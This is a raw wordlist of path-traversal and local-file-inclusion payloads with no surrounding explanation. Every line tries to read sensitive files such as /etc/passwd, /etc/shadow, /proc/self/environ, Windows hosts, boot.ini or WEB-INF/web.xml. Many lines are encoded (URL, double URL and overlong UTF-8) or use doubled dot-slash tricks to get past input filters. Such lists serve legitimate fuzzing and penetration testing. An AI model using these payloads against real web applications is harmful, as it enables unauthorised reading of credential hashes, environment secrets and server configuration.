../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
..%2f..%2f..%2fetc/passwd
..%252f..%252f..%252fetc/passwd
....//....//....//etc/passwd
..\/..\/..\/etc/passwd
..\\..\\..\\etc/passwd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9cetc/passwd
..%255c..%255cetc/passwd
....\/....\/....\/etc/passwd
/....//etc/passwd
..\..\..\windows\system32\drivers\etc\hosts
..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
....//....//....//etc/shadow
/proc/self/environ
/proc/self/cmdline
/proc/version
/proc/self/fd/0
../../boot.ini
../../../boot.ini
../../WEB-INF/web.xml
../../../WEB-INF/web.xml
